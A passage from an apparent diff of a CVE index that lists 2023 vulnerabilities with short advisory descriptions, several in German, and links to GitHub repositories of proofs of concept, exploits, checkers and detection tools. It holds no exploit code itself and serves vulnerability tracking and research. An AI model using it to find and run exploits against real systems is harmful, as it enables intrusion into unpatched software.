+### CVE-2023-3971 (2023-10-04)
+
+An HTML injection flaw was found in Controller in the user interface settings. This flaw allows an attacker to capture credentials by creating a custom login page by injecting HTML, resulting in a complete compromise.
+
+
+- [ashangp923/CVE-2023-3971](https://github.com/ashangp923/CVE-2023-3971)
+
+### CVE-2023-4128
+- [Trinadh465/linux-4.1.15_CVE-2023-4128](https://github.com/Trinadh465/linux-4.1.15_CVE-2023-4128)
+
+### CVE-2023-4145 (2023-08-03)
+
+Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/customer-data-framework prior to 3.4.2.
+
+
+- [miguelc49/CVE-2023-4145-2](https://github.com/miguelc49/CVE-2023-4145-2)
+- [miguelc49/CVE-2023-4145-1](https://github.com/miguelc49/CVE-2023-4145-1)
+- [miguelc49/CVE-2023-4145-3](https://github.com/miguelc49/CVE-2023-4145-3)
+
+### CVE-2023-4165 (2023-08-05)
+
+Es wurde eine kritische Schwachstelle in Tongda OA gefunden. Hiervon betroffen ist ein unbekannter Codeblock der Datei general/system/seal_manage/iweboffice/delete_seal.php. Dank der Manipulation des Arguments DELETE_STR mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 11.10 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen.
+
+
+- [mvpyyds/CVE-2023-4165](https://github.com/mvpyyds/CVE-2023-4165)
+
+### CVE-2023-4166 (2023-08-05)
+
+In Tongda OA wurde eine kritische Schwachstelle gefunden. Betroffen ist eine unbekannte Verarbeitung der Datei general/system/seal_manage/dianju/delete_log.php. Dank Manipulation des Arguments DELETE_STR mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 11.10 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen.
+
+
+- [mvpyyds/CVE-2023-4166](https://github.com/mvpyyds/CVE-2023-4166)
+
+### CVE-2023-4169 (2023-08-05)
+
+In Ruijie RG-EW1200G 1.0(1)B1P5 wurde eine kritische Schwachstelle ausgemacht. Es geht um eine nicht näher bekannte Funktion der Datei /api/sys/set_passwd der Komponente Administrator Password Handler. Durch Manipulation mit unbekannten Daten kann eine improper access controls-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung.
+
+
+- [thedarknessdied/CVE-2023-4169_CVE-2023-3306_CVE-2023-4415](https://github.com/thedarknessdied/CVE-2023-4169_CVE-2023-3306_CVE-2023-4415)
+
+### CVE-2023-4174 (2023-08-06)
+
+In mooSocial mooStore 3.1.6 wurde eine Schwachstelle gefunden. Sie wurde als problematisch eingestuft. Hierbei betrifft es unbekannten Programmcode. Mittels Manipulieren mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk.
+
+
+- [d0rb/CVE-2023-4174](https://github.com/d0rb/CVE-2023-4174)
+
+### CVE-2023-4197 (2023-11-01)
+
+Improper input validation in Dolibarr ERP CRM <= v18.0.1 fails to strip certain PHP code from user-supplied input when creating a Website, allowing an attacker to inject and evaluate arbitrary PHP code.
+
+
+- [alien-keric/CVE-2023-4197](https://github.com/alien-keric/CVE-2023-4197)
+
+### CVE-2023-4206 (2023-09-06)
+
+A use-after-free vulnerability in the Linux kernel's net/sched: cls_route component can be exploited to achieve local privilege escalation.\n\nWhen route4_change() is called on an existing filter, the whole tcf_result struct is always copied into the new instance of the filter. This causes a problem when updating a filter bound to a class, as tcf_unbind_filter() is always called on the old instance in the success path, decreasing filter_cnt of the still referenced class and allowing it to be deleted, leading to a use-after-free.\n\nWe recommend upgrading past commit b80b829e9e2c1b3f7aae34855e04d8f6ecaf13c8.\n\n
+
+
+- [hshivhare67/Kernel_4.1.15_CVE-2023-4206_CVE-2023-4207_CVE-2023-4208](https://github.com/hshivhare67/Kernel_4.1.15_CVE-2023-4206_CVE-2023-4207_CVE-2023-4208)
+
+### CVE-2023-4278 (2023-09-11)
+
+The MasterStudy LMS WordPress Plugin WordPress plugin before 3.0.18 does not have proper checks in place during registration allowing anyone to register on the site as an instructor. They can then add courses and/or posts.
+
+
+- [revan-ar/CVE-2023-4278](https://github.com/revan-ar/CVE-2023-4278)
+
+### CVE-2023-4279 (2023-09-04)
+
+This User Activity Log WordPress plugin before 1.6.7 retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to hide the source of malicious traffic.
+
+
+- [b0marek/CVE-2023-4279](https://github.com/b0marek/CVE-2023-4279)
+
+### CVE-2023-4281 (2023-09-25)
+
+This Activity Log WordPress plugin before 2.8.8 retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to hide the source of malicious traffic.
+
+
+- [b0marek/CVE-2023-4281](https://github.com/b0marek/CVE-2023-4281)
+
+### CVE-2023-4294 (2023-09-11)
+
+The URL Shortify WordPress plugin before 1.7.6 does not properly escape the value of the referer header, thus allowing an unauthenticated attacker to inject malicious javascript that will trigger in the plugins admin panel with statistics of the created short link.
+
+
+- [b0marek/CVE-2023-4294](https://github.com/b0marek/CVE-2023-4294)
+
+### CVE-2023-4357 (2023-08-15)
+
+Insufficient validation of untrusted input in XML in Google Chrome prior to 116.0.5845.96 allowed a remote attacker to bypass file access restrictions via a crafted HTML page. (Chromium security severity: Medium)
+
+
+- [xcanwin/CVE-2023-4357-Chrome-XXE](https://github.com/xcanwin/CVE-2023-4357-Chrome-XXE)
+- [OgulcanUnveren/CVE-2023-4357-APT-Style-exploitation](https://github.com/OgulcanUnveren/CVE-2023-4357-APT-Style-exploitation)
+- [passwa11/CVE-2023-4357-APT-Style-exploitation](https://github.com/passwa11/CVE-2023-4357-APT-Style-exploitation)
+- [sunu11/chrome-CVE-2023-4357](https://github.com/sunu11/chrome-CVE-2023-4357)
+- [WinnieZy/CVE-2023-4357](https://github.com/WinnieZy/CVE-2023-4357)
+- [CamillaFranceschini/CVE-2023-4357](https://github.com/CamillaFranceschini/CVE-2023-4357)
+
+### CVE-2023-4427 (2023-08-22)
+
+Out of bounds memory access in V8 in Google Chrome prior to 116.0.5845.110 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High)
+
+
+- [tianstcht/CVE-2023-4427](https://github.com/tianstcht/CVE-2023-4427)
+
+### CVE-2023-4450 (2023-08-21)
+
+In jeecgboot JimuReport bis 1.6.0 wurde eine kritische Schwachstelle ausgemacht. Das betrifft eine unbekannte Funktionalität der Komponente Template Handler. Durch Manipulation mit unbekannten Daten kann eine injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 1.6.1 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen.
+
+
+- [ilikeoyt/CVE-2023-4450-Attack](https://github.com/ilikeoyt/CVE-2023-4450-Attack)
+
+### CVE-2023-4460 (2023-12-04)
+
+The Uploading SVG, WEBP and ICO files WordPress plugin through 1.2.1 does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.
+
+
+- [0xn4d/poc-cve-xss-uploading-svg](https://github.com/0xn4d/poc-cve-xss-uploading-svg)
+
+### CVE-2023-4549 (2023-09-25)
+
+The DoLogin Security WordPress plugin before 3.7 does not properly sanitize IP addresses coming from the X-Forwarded-For header, which can be used by attackers to conduct Stored XSS attacks via WordPress' login form.
+
+
+- [b0marek/CVE-2023-4549](https://github.com/b0marek/CVE-2023-4549)
+
+### CVE-2023-4568 (2023-09-13)
+
+PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.
+
+
+- [Cappricio-Securities/CVE-2023-4568](https://github.com/Cappricio-Securities/CVE-2023-4568)
+
+### CVE-2023-4596 (2023-08-30)
+
+The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
+
+
+- [E1A/CVE-2023-4596](https://github.com/E1A/CVE-2023-4596)
+- [X-Projetion/CVE-2023-4596-Vulnerable-Exploit-and-Checker-Version](https://github.com/X-Projetion/CVE-2023-4596-Vulnerable-Exploit-and-Checker-Version)
+- [RHYru9/CVE-2023-4596-checker](https://github.com/RHYru9/CVE-2023-4596-checker)
+
+### CVE-2023-4631 (2023-09-25)
+
+The DoLogin Security WordPress plugin before 3.7 uses headers such as the X-Forwarded-For to retrieve the IP address of the request, which could lead to IP spoofing.
+
+
+- [b0marek/CVE-2023-4631](https://github.com/b0marek/CVE-2023-4631)
+
+### CVE-2023-4634 (2023-09-06)
+
+The Media Library Assistant plugin for WordPress is vulnerable to Local File Inclusion and Remote Code Execution in versions up to, and including, 3.09. This is due to insufficient controls on file paths being supplied to the 'mla_stream_file' parameter from the ~/includes/mla-stream-image.php file, where images are processed via Imagick(). This makes it possible for unauthenticated attackers to supply files via FTP that will make directory lists, local file inclusion, and remote code execution possible.
+
+
+- [Patrowl/CVE-2023-4634](https://github.com/Patrowl/CVE-2023-4634)
+
+### CVE-2023-4636 (2023-09-05)
+
+The WordPress File Sharing Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 2.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+
+
+- [ThatNotEasy/CVE-2023-4636](https://github.com/ThatNotEasy/CVE-2023-4636)
+
+### CVE-2023-4683 (2023-08-31)
+
+NULL Pointer Dereference in GitHub repository gpac/gpac prior to 2.3-DEV.
+
+
+- [Songg45/CVE-2023-4683-Test](https://github.com/Songg45/CVE-2023-4683-Test)
+
+### CVE-2023-4696 (2023-09-01)
+
+Improper Access Control in GitHub repository usememos/memos prior to 0.13.2.
+
+
+- [mnqazi/CVE-2023-4696](https://github.com/mnqazi/CVE-2023-4696)
+
+### CVE-2023-4698 (2023-09-01)
+
+Improper Input Validation in GitHub repository usememos/memos prior to 0.13.2.
+
+
+- [mnqazi/CVE-2023-4698](https://github.com/mnqazi/CVE-2023-4698)
+
+### CVE-2023-4699 (2023-11-06)
+
+Insufficient Verification of Data Authenticity vulnerability in Mitsubishi Electric Corporation MELSEC-F Series main modules and MELSEC iQ-F Series CPU modules allows a remote unauthenticated attacker to reset the memory of the products to factory default state and cause denial-of-service (DoS) condition on the products by sending specific packets.\n\n\n\n\n\n\n
+
+
+- [Scottzxor/Citrix-Bleed-Buffer-Overread-Demo](https://github.com/Scottzxor/Citrix-Bleed-Buffer-Overread-Demo)
+
+### CVE-2023-4741 (2023-09-03)
+
+In IBOS OA 4.5.5 wurde eine kritische Schwachstelle gefunden. Es geht um eine nicht näher bekannte Funktion der Datei ?r=diary/default/del der Komponente Delete Logs Handler. Durch das Manipulieren mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung.
+
+
+- [wudidike/CVE-2023-4741](https://github.com/wudidike/CVE-2023-4741)
+
+### CVE-2023-4762 (2023-09-05)
+
+Type Confusion in V8 in Google Chrome prior to 116.0.5845.179 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High)
+
+
+- [buptsb/CVE-2023-4762](https://github.com/buptsb/CVE-2023-4762)
+- [sherlocksecurity/CVE-2023-4762-Code-Review](https://github.com/sherlocksecurity/CVE-2023-4762-Code-Review)
+
+### CVE-2023-4771 (2023-11-16)
+
+A Cross-Site scripting vulnerability has been found in CKSource CKEditor affecting versions 4.15.1 and earlier. An attacker could send malicious javascript code through the /ckeditor/samples/old/ajax.html file and retrieve an authorized user's information.
+
+
+- [sahar042/CVE-2023-4771](https://github.com/sahar042/CVE-2023-4771)
+
+### CVE-2023-4800 (2023-10-16)
+
+The DoLogin Security WordPress plugin before 3.7.1 does not restrict the access of a widget that shows the IPs of failed logins to low privileged users.
+
+
+- [b0marek/CVE-2023-4800](https://github.com/b0marek/CVE-2023-4800)
+
+### CVE-2023-4813 (2023-09-12)
+
+A flaw was found in glibc. In an uncommon situation, the gaih_inet function may use memory that has been freed, resulting in an application crash. This issue is only exploitable when the getaddrinfo function is called and the hosts database in /etc/nsswitch.conf is configured with SUCCESS=continue or SUCCESS=merge.
+
+
+- [tnishiox/cve-2023-4813](https://github.com/tnishiox/cve-2023-4813)
+
+### CVE-2023-4863 (2023-09-12)
+
+Heap buffer overflow in libwebp in Google Chrome prior to 116.0.5845.187 and libwebp 1.3.2 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: Critical)
+
+
+- [mistymntncop/CVE-2023-4863](https://github.com/mistymntncop/CVE-2023-4863)
+- [bbaranoff/CVE-2023-4863](https://github.com/bbaranoff/CVE-2023-4863)
+- [talbeerysec/BAD-WEBP-CVE-2023-4863](https://github.com/talbeerysec/BAD-WEBP-CVE-2023-4863)
+- [OITApps/Find-VulnerableElectronVersion](https://github.com/OITApps/Find-VulnerableElectronVersion)
+- [GTGalaxi/ElectronVulnerableVersion](https://github.com/GTGalaxi/ElectronVulnerableVersion)
+- [murphysecurity/libwebp-checker](https://github.com/murphysecurity/libwebp-checker)
+- [huiwen-yayaya/CVE-2023-4863](https://github.com/huiwen-yayaya/CVE-2023-4863)
+- [LiveOverflow/webp-CVE-2023-4863](https://github.com/LiveOverflow/webp-CVE-2023-4863)
+- [caoweiquan322/NotEnough](https://github.com/caoweiquan322/NotEnough)
+- [CrackerCat/CVE-2023-4863-](https://github.com/CrackerCat/CVE-2023-4863-)
+- [alsaeroth/CVE-2023-4863-POC](https://github.com/alsaeroth/CVE-2023-4863-POC)
+
+### CVE-2023-4911 (2023-10-03)
+
+A buffer overflow was discovered in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES environment variable. This issue could allow a local attacker to use maliciously crafted GLIBC_TUNABLES environment variables when launching binaries with SUID permission to execute code with elevated privileges.
+
+
+- [Green-Avocado/CVE-2023-4911](https://github.com/Green-Avocado/CVE-2023-4911)
+- [leesh3288/CVE-2023-4911](https://github.com/leesh3288/CVE-2023-4911)
+- [RickdeJager/CVE-2023-4911](https://github.com/RickdeJager/CVE-2023-4911)
+- [xiaoQ1z/CVE-2023-4911](https://github.com/xiaoQ1z/CVE-2023-4911)
+- [silent6trinity/looney-tuneables](https://github.com/silent6trinity/looney-tuneables)
+- [hadrian3689/looney-tunables-CVE-2023-4911](https://github.com/hadrian3689/looney-tunables-CVE-2023-4911)
+- [ruycr4ft/CVE-2023-4911](https://github.com/ruycr4ft/CVE-2023-4911)
+- [guffre/CVE-2023-4911](https://github.com/guffre/CVE-2023-4911)
+- [chaudharyarjun/LooneyPwner](https://github.com/chaudharyarjun/LooneyPwner)
+- [KernelKrise/CVE-2023-4911](https://github.com/KernelKrise/CVE-2023-4911)
+- [Diego-AltF4/CVE-2023-4911](https://github.com/Diego-AltF4/CVE-2023-4911)
+- [teraGL/looneyCVE](https://github.com/teraGL/looneyCVE)
+- [snurkeburk/Looney-Tunables](https://github.com/snurkeburk/Looney-Tunables)
+- [puckiestyle/CVE-2023-4911](https://github.com/puckiestyle/CVE-2023-4911)
+- [yanfernandess/Looney-Tunables-CVE-2023-4911](https://github.com/yanfernandess/Looney-Tunables-CVE-2023-4911)
+- [NishanthAnand21/CVE-2023-4911-PoC](https://github.com/NishanthAnand21/CVE-2023-4911-PoC)
+
+### CVE-2023-4966 (2023-10-10)
+
+Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server. \n\n\n\n
+
+
+- [Chocapikk/CVE-2023-4966](https://github.com/Chocapikk/CVE-2023-4966)
+- [dinosn/citrix_cve-2023-4966](https://github.com/dinosn/citrix_cve-2023-4966)
+- [senpaisamp/Netscaler-CVE-2023-4966-POC](https://github.com/senpaisamp/Netscaler-CVE-2023-4966-POC)
+- [mlynchcogent/CVE-2023-4966-POC](https://github.com/mlynchcogent/CVE-2023-4966-POC)
+- [IceBreakerCode/CVE-2023-4966](https://github.com/IceBreakerCode/CVE-2023-4966)
+- [0xKayala/CVE-2023-4966](https://github.com/0xKayala/CVE-2023-4966)
+- [certat/citrix-logchecker](https://github.com/certat/citrix-logchecker)
+- [RevoltSecurities/CVE-2023-4966](https://github.com/RevoltSecurities/CVE-2023-4966)
+- [s-bt/CVE-2023-4966](https://github.com/s-bt/CVE-2023-4966)
+- [byte4RR4Y/CVE-2023-4966](https://github.com/byte4RR4Y/CVE-2023-4966)
+- [jmussmann/cve-2023-4966-iocs](https://github.com/jmussmann/cve-2023-4966-iocs)
+- [morganwdavis/overread](https://github.com/morganwdavis/overread)
+
+### CVE-2023-5024 (2023-09-17)
+
+Es wurde eine Schwachstelle in Planno 23.04.04 ausgemacht. Sie wurde als problematisch eingestuft. Es betrifft eine unbekannte Funktion der Komponente Comment Handler. Durch Beeinflussen mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung.
+
+
+- [PH03N1XSP/CVE-2023-5024](https://github.com/PH03N1XSP/CVE-2023-5024)
+
+### CVE-2023-5043 (2023-10-25)
+
+Ingress nginx annotation injection causes arbitrary command execution.\n
+
+
+- [r0binak/CVE-2023-5043](https://github.com/r0binak/CVE-2023-5043)
+
+### CVE-2023-5044 (2023-10-25)
+
+Code injection via nginx.ingress.kubernetes.io/permanent-redirect annotation.\n
+
+
+- [r0binak/CVE-2023-5044](https://github.com/r0binak/CVE-2023-5044)
+- [4ARMED/cve-2023-5044](https://github.com/4ARMED/cve-2023-5044)
+- [KubernetesBachelor/CVE-2023-5044](https://github.com/KubernetesBachelor/CVE-2023-5044)
+
+### CVE-2023-5070 (2023-10-20)
+
+The Social Media Share Buttons & Social Sharing Icons plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 2.8.5 via the sfsi_save_export function. This can allow subscribers to export plugin settings that include social media authentication tokens and secrets as well as app passwords.
+
+
+- [RandomRobbieBF/CVE-2023-5070](https://github.com/RandomRobbieBF/CVE-2023-5070)
+
+### CVE-2023-5089 (2023-10-16)
+
+The Defender Security WordPress plugin before 4.1.0 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the login page, even when the hide login page functionality of the plugin is enabled.
+
+
+- [Cappricio-Securities/CVE-2023-5089](https://github.com/Cappricio-Securities/CVE-2023-5089)
+
+### CVE-2023-5142 (2023-09-24)
+
+In H3C GR-1100-P, GR-1108-P, GR-1200W, GR-1800AX, GR-2200, GR-3200, GR-5200, GR-8300, ER2100n, ER2200G2, ER3200G2, ER3260G2, ER5100G2, ER5200G2 and ER6300G2 bis 20230908 wurde eine Schwachstelle entdeckt. Sie wurde als problematisch eingestuft. Dabei geht es um eine nicht genauer bekannte Funktion der Datei /userLogin.asp der Komponente Config File Handler. Durch das Beeinflussen mit unbekannten Daten kann eine path traversal-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Die Komplexität eines Angriffs ist eher hoch. Das Ausnutzen gilt als schwierig. Der Exploit steht zur öffentlichen Verfügung.
+
+
+- [kuangxiaotu/CVE-H3C-Report](https://github.com/kuangxiaotu/CVE-H3C-Report)
+
+### CVE-2023-5178 (2023-11-01)
+
+A use-after-free vulnerability was found in drivers/nvme/target/tcp.c` in `nvmet_tcp_free_crypto` due to a logical bug in the NVMe/TCP subsystem in the Linux kernel. This issue may allow a malicious user to cause a use-after-free and double-free problem, which may permit remote code execution or lead to local privilege escalation.
+
+
+- [rockrid3r/CVE-2023-5178](https://github.com/rockrid3r/CVE-2023-5178)
+
+### CVE-2023-5204 (2023-10-19)
+
+The ChatBot plugin for WordPress is vulnerable to SQL Injection via the $strid parameter in versions up to, and including, 4.8.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+
+
+- [RandomRobbieBF/CVE-2023-5204](https://github.com/RandomRobbieBF/CVE-2023-5204)
+
+### CVE-2023-5217 (2023-09-28)
+
+Heap buffer overflow in vp8 encoding in libvpx in Google Chrome prior to 117.0.5938.132 and libvpx 1.13.1 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
+
+
+- [UT-Security/cve-2023-5217-poc](https://github.com/UT-Security/cve-2023-5217-poc)
+- [Trinadh465/platform_external_libvpx_v1.8.0_CVE-2023-5217](https://github.com/Trinadh465/platform_external_libvpx_v1.8.0_CVE-2023-5217)
+- [Trinadh465/platform_external_libvpx_v1.4.0_CVE-2023-5217](https://github.com/Trinadh465/platform_external_libvpx_v1.4.0_CVE-2023-5217)
+
+### CVE-2023-5324 (2023-10-01)
+
+In eeroOS bis 6.16.4-11 wurde eine kritische Schwachstelle gefunden. Hierbei betrifft es unbekannten Programmcode der Komponente Ethernet Interface. Durch die Manipulation mit unbekannten Daten kann eine denial of service-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff im lokalen Netzwerk. Der Exploit steht zur öffentlichen Verfügung.
+
+
+- [nomis/eero-zero-length-ipv6-options-header-dos](https://github.com/nomis/eero-zero-length-ipv6-options-header-dos)
+
+### CVE-2023-5360 (2023-10-31)
+
+The Royal Elementor Addons and Templates WordPress plugin before 1.3.79 does not properly validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE.
+
+
+- [sagsooz/CVE-2023-5360](https://github.com/sagsooz/CVE-2023-5360)
+- [phankz/Worpress-CVE-2023-5360](https://github.com/phankz/Worpress-CVE-2023-5360)
+- [nastar-id/CVE-2023-5360](https://github.com/nastar-id/CVE-2023-5360)
+- [Chocapikk/CVE-2023-5360](https://github.com/Chocapikk/CVE-2023-5360)
+- [tucommenceapousser/CVE-2023-5360](https://github.com/tucommenceapousser/CVE-2023-5360)
+- [Jenderal92/WP-CVE-2023-5360](https://github.com/Jenderal92/WP-CVE-2023-5360)
+- [Pushkarup/CVE-2023-5360](https://github.com/Pushkarup/CVE-2023-5360)
+- [1337r0j4n/CVE-2023-5360](https://github.com/1337r0j4n/CVE-2023-5360)
+- [angkerithhack001/CVE-2023-5360-PoC](https://github.com/angkerithhack001/CVE-2023-5360-PoC)
+
+### CVE-2023-5412 (2023-10-31)
+
+The Image horizontal reel scroll slideshow plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 13.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+
+
+- [RandomRobbieBF/CVE-2023-5412](https://github.com/RandomRobbieBF/CVE-2023-5412)
+
+### CVE-2023-5521 (2023-10-11)
+
+Incorrect Authorization in GitHub repository tiann/kernelsu prior to v0.6.9.
+
+
+- [Ylarod/CVE-2023-5521](https://github.com/Ylarod/CVE-2023-5521)
+
+### CVE-2023-5538 (2023-10-18)
+
+The MpOperationLogs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the IP Request Headers in versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+
+
+- [juweihuitao/MpOperationLogs](https://github.com/juweihuitao/MpOperationLogs)
+
+### CVE-2023-5539 (2023-11-09)
+
+A remote code execution risk was identified in the Lesson activity. By default this was only available to teachers and managers.
+
+
+- [cli-ish/CVE-2023-5539](https://github.com/cli-ish/CVE-2023-5539)
+
+### CVE-2023-5540 (2023-11-09)
+
+A remote code execution risk was identified in the IMSCP activity. By default this was only available to teachers and managers.
+
+
+- [cli-ish/CVE-2023-5540](https://github.com/cli-ish/CVE-2023-5540)
+
+### CVE-2023-5546 (2023-11-09)
+
+ID numbers displayed in the quiz grading report required additional sanitizing to prevent a stored XSS risk.
+
+
+- [obelia01/CVE-2023-5546](https://github.com/obelia01/CVE-2023-5546)
+
+### CVE-2023-5561 (2023-10-16)
+
+WordPress does not properly restrict which user fields are searchable via the REST API, allowing unauthenticated attackers to discern the email addresses of users who have published public posts on an affected website via an Oracle style attack
+
+
+- [pog007/CVE-2023-5561-PoC](https://github.com/pog007/CVE-2023-5561-PoC)
+
+### CVE-2023-5717 (2023-10-25)
+
+A heap out-of-bounds write vulnerability in the Linux kernel's Linux Kernel Performance Events (perf) component can be exploited to achieve local privilege escalation.\n\nIf perf_read_group() is called while an event's sibling_list is smaller than its child's sibling_list, it can increment or write to memory locations outside of the allocated buffer.\n\nWe recommend upgrading past commit 32671e3799ca2e4590773fd0e63aaa4229e50c06.\n\n
+
+
+- [uthrasri/CVE-2023-5717](https://github.com/uthrasri/CVE-2023-5717)
+
+### CVE-2023-5720 (2023-11-15)
+
+A flaw was found in Quarkus, where it does not properly sanitize artifacts created using the Gradle plugin, allowing certain build system information to remain. This flaw allows an attacker to access potentially sensitive information from the build system within the application.
+
+
+- [miguelc49/CVE-2023-5720-2](https://github.com/miguelc49/CVE-2023-5720-2)
+- [miguelc49/CVE-2023-5720-1](https://github.com/miguelc49/CVE-2023-5720-1)
+- [miguelc49/CVE-2023-5720-3](https://github.com/miguelc49/CVE-2023-5720-3)
+
+### CVE-2023-5808 (2023-12-04)
+
+SMU versions prior to 14.8.7825.01 are susceptible to unintended information disclosure, through URL manipulation. Authenticated users in a Storage administrative role are able to access HNAS configuration backup and diagnostic data, that would normally be barred to that specific administrative role.
+
+
+- [Arszilla/CVE-2023-5808](https://github.com/Arszilla/CVE-2023-5808)
+
+### CVE-2023-5961 (2023-12-23)
+
+A Cross-Site Request Forgery (CSRF) vulnerability has been identified in ioLogik E1200 Series firmware versions v3.3 and prior. An attacker can exploit this vulnerability to trick a client into making an unintentional request to the web server, which will be treated as an authentic request. This vulnerability may lead an attacker to perform operations on behalf of the victimized user.\n\n
+
+
+- [HadessCS/CVE-2023-5961](https://github.com/HadessCS/CVE-2023-5961)
+
+### CVE-2023-6019 (2023-11-16)
+
+A command injection existed in Ray's cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely without authentication. The issue is fixed in version 2.8.1+. Ray maintainers' response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023
+
+
+- [FireWolfWang/CVE-2023-6019](https://github.com/FireWolfWang/CVE-2023-6019)
+- [miguelc49/CVE-2023-6019-2](https://github.com/miguelc49/CVE-2023-6019-2)
+- [miguelc49/CVE-2023-6019-1](https://github.com/miguelc49/CVE-2023-6019-1)
+- [miguelc49/CVE-2023-6019-3](https://github.com/miguelc49/CVE-2023-6019-3)
+- [Clydeston/CVE-2023-6019](https://github.com/Clydeston/CVE-2023-6019)
+
+### CVE-2023-6036 (2024-02-12)
+
+The Web3 WordPress plugin before 3.0.0 is vulnerable to an authentication bypass due to incorrect authentication checking in the login flow in functions 'handle_auth_request' and 'hadle_login_request'. This makes it possible for non authenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.
+
+
+- [pctripsesp/CVE-2023-6036](https://github.com/pctripsesp/CVE-2023-6036)
+
+### CVE-2023-6063 (2023-12-04)
+
+The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
+
+
+- [motikan2010/CVE-2023-6063-PoC](https://github.com/motikan2010/CVE-2023-6063-PoC)
+- [hackersroot/CVE-2023-6063-PoC](https://github.com/hackersroot/CVE-2023-6063-PoC)
+- [thesafdari/CVE-2023-6063](https://github.com/thesafdari/CVE-2023-6063)
+
+### CVE-2023-6241 (2024-03-04)
+
+Use After Free vulnerability in Arm Ltd Midgard GPU Kernel Driver, Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user to exploit a software race condition to perform improper memory processing operations. If the system’s memory is carefully prepared by the user, then this in turn cause a use-after-free.This issue affects Midgard GPU Kernel Driver: from r13p0 through r32p0; Bifrost GPU Kernel Driver: from r11p0 through r25p0; Valhall GPU Kernel Driver: from r19p0 through r25p0, from r29p0 through r46p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r46p0.\n\n
+
+
+- [s1204IT/CVE-2023-6241](https://github.com/s1204IT/CVE-2023-6241)
+
+### CVE-2023-6246 (2024-01-31)
+
+A heap-based buffer overflow was found in the __vsyslog_internal function of the glibc library. This function is called by the syslog and vsyslog functions. This issue occurs when the openlog function was not called, or called with the ident argument set to NULL, and the program name (the basename of argv[0]) is bigger than 1024 bytes, resulting in an application crash or local privilege escalation. This issue affects glibc 2.36 and newer.
+
+
+- [elpe-pinillo/CVE-2023-6246](https://github.com/elpe-pinillo/CVE-2023-6246)
+
+### CVE-2023-6289 (2023-12-18)
+
+The Swift Performance Lite WordPress plugin before 2.3.6.15 does not prevent users from exporting the plugin's settings, which may include sensitive information such as Cloudflare API tokens.
+
+
+- [RandomRobbieBF/CVE-2023-6289](https://github.com/RandomRobbieBF/CVE-2023-6289)
+
+### CVE-2023-6319 (2024-04-09)
+
